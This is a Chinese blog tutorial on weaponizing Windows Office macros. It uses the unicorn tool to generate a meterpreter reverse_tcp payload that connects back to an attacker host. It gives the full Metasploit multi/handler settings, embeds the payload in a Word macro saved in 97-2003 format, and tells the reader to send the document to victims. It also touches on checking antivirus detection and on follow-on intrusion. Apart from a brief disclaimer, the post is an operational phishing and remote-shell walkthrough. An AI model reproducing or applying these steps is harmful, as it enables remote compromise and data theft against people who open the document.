zoukankan      html  css  js  c++  java
  • Windows宏病毒利用

    背景:

    最近忙的飞起,各种事情,不想吐槽,因为某些事情,还吃了口屎,啧啧啧。。。。。

    常见的钓鱼,社工基本技术都是这种,什么鱼叉,水坑,社工,投毒之类的,APT 攻击惯用伎俩。

    那么今天主要利用Windows office 宏进行远程攻击。

    环境:

    kail Linux 2018 xface

    Windows 10 home  office 2016

    直接上操作:

    kail linux 

    # git clone https://github.com/trustedsec/unicorn.git

    此工具使用具体看帮助信息,这里不多说明,也可以去Git上查看

    生成payload:

    # python unicorn.py windows/meterpreter/reverse_tcp 1.1.1.1 4444 macro

    会生成:

    powershell_attack.txt #office宏payload

    unicorn.rc #msf使用

    两个文件

    启动msfconsole

    use multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 1.1.1.1
    set LPORT 4444
    set ExitOnSession false
    set AutoVerifySession false
    set AutoSystemInfo false
    set AutoLoadStdapi false
    exploit -j

    靶机Windows10 主机上生成带有宏病毒的office Word文档

    记得打开开发者选项,输入正文内容

    点击宏,输入宏名称,然后点击新建

    这里将生成的payload 复制进去

    然后点击保存,导出文档为97-2003 文档格式

    将文档发给受害者,打开文档就直接上线。

    okay msf这边已经上线

    在这里可能有人可能会问题,那报毒怎么办,那么我杀毒检测看看,看看稳不稳:

    后面就是进程迁移,后持续渗透,内网深入渗透了。。。。

    请勿使用非法用途,否则后果自负。。。。。

    备注:生成的payload需要修改下,否则会导致不运行或者运行完成后退出。。。。

  • 相关阅读:
    IE 兼容问题笔记
    php编码与解码
    php 一些神奇加有趣的函数
    RESTful 规范
    关于CSS3背景渐变色无效问题
    ECShop
    php中的PHP_EOL换行符
    用 openSSL 生成 公钥 私钥
    app调用支付宝支付 笔记
    utf8 文件 错误保存为gbk 中文乱码 解决方法
  • 原文地址:https://www.cnblogs.com/hack404/p/11876059.html
Copyright © 2011-2022 走看看